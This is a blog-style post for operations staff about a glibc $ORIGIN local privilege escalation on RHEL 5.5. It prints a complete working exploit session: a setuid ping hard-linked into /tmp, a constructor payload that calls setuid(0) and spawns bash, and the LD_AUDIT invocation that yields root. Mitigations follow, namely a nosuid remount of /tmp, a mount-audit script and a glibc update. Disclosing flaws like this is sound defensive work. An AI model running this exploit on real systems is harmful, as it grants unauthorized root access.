Linux glibc vulnerability: an ordinary user can obtain root privileges. Tested on RHEL 5.5 32-bit.
Principle: the GNU C library dynamic linker expands $ORIGIN in the setuid library search path.
1. Create an ordinary test user:
[root@www.bkjia.com ~]# useradd test
[root@www.bkjia.com ~]# passwd test
Changing password for user test.
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
2. Switch to this user:
[root@www.bkjia.com ~]# su - test
[test@www.bkjia.com ~]$ whoami
test
[test@www.bkjia.com ~]$ useradd user1
-bash: useradd: command not found
3. Start the privilege escalation
[test@www.bkjia.com ~]$ mkdir /tmp/exploit
[test@www.bkjia.com ~]$ ln /bin/ping /tmp/exploit/target
[test@www.bkjia.com ~]$ exec 3< /tmp/exploit/target
[test@www.bkjia.com ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test 64 08-07 /proc/5922/fd/3 -> /tmp/exploit/target
[test@www.bkjia.com ~]$ rm -rf /tmp/exploit/
[test@www.bkjia.com ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test 64 08-07 /proc/5922/fd/3 -> /tmp/exploit/target (deleted)
[test@www.bkjia.com ~]$ cat > payload.c
----------------------------------------
#include <stdlib.h>
#include <unistd.h>

/* Runs when the shared object is loaded by the dynamic linker */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
----------------------------------------
[test@www.bkjia.com ~]$ cat payload.c
#include <stdlib.h>
#include <unistd.h>

/* Runs when the shared object is loaded by the dynamic linker */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[test@www.bkjia.com ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@www.bkjia.com ~]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test 4223 08-07 /tmp/exploit
[test@www.bkjia.com ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [-T timestamp option] [-Q tos] [hop1 ...] destination
4. Permission verification:
[root@www.bkjia.com ~]# whoami
root
[root@www.bkjia.com ~]# useradd user1
[root@www.bkjia.com ~]# useradd user2
[root@www.bkjia.com ~]# ls /home/
test  user1  user2
[root@www.bkjia.com ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
The privilege escalation has succeeded. As an operations engineer, we need to provide a solution to this problem.
There are two solutions:
1. Bind-mount /tmp with nosuid
The principle of nosuid: only root may modify /etc/passwd, yet an ordinary user can still change his or her own password, because the passwd program carries the setuid bit and runs with privileges beyond the user's own. Mounting a filesystem with nosuid makes the kernel ignore the setuid bit on files in it, which stops this method of privilege escalation. The /tmp directory, where the hard link to ping was created, is writable by everyone, so we need to control it strictly.
mount -o bind /tmp /tmp
mount -o remount,bind,nosuid /tmp
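As an added check to go with solution 1 (not from the original post), the following POSIX shell script parses /proc/mounts-style lines and reports whether the world-writable temp directories carry nosuid. The sample mount tables are constructed, and the list of directories audited is an assumption.

```shell
#!/bin/sh
# Added audit helper (not from the original post): check whether a mount
# point carries a given option by parsing /proc/mounts-style lines.

# Constructed sample: what /proc/mounts shows after the bind + nosuid remount.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,relatime 0 0
/tmp /tmp none rw,bind,nosuid 0 0'

# Constructed sample of a host where /tmp was never remounted at all.
SAMPLE_MOUNTS_BARE='/dev/sda1 / ext3 rw,relatime 0 0'

# mount_has_opt MOUNTS_TEXT MOUNTPOINT OPTION
# Prints "yes" (exit 0), "no" (exit 1) or "absent" (exit 2: the path is not
# a mount point of its own, so it inherits the options of its parent mount).
mount_has_opt() {
    printf '%s\n' "$1" | awk -v mp="$2" -v opt="$3" '
        $2 == mp { opts = $4 }   # last entry wins if the path is mounted over twice
        END {
            if (opts == "") { print "absent"; exit 2 }
            n = split(opts, a, ",")
            for (i = 1; i <= n; i++) if (a[i] == opt) { print "yes"; exit 0 }
            print "no"; exit 1
        }'
}

# audit_nosuid MOUNTS_TEXT: report the temp directories (assumed list) from
# which an ordinary user could still execute a setuid binary.
# Prints one "PATH STATUS" line per directory; returns 1 if any lacks nosuid.
audit_nosuid() {
    rc=0
    for d in /tmp /var/tmp /dev/shm; do
        st=$(mount_has_opt "$1" "$d" nosuid)
        [ "$st" = yes ] || rc=1
        printf '%s %s\n' "$d" "$st"
    done
    return $rc
}

# Audit the live system when /proc/mounts is readable, else the sample table.
if [ -r /proc/mounts ]; then mounts=$(cat /proc/mounts); else mounts=$SAMPLE_MOUNTS; fi
audit_nosuid "$mounts" || echo "WARNING: at least one temp directory lacks nosuid"
```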
2. Update glibc (the fix officially recommended by Red Hat)
yum -y update glibc
I hope the operations colleagues reading this article update their software and patches in a timely manner.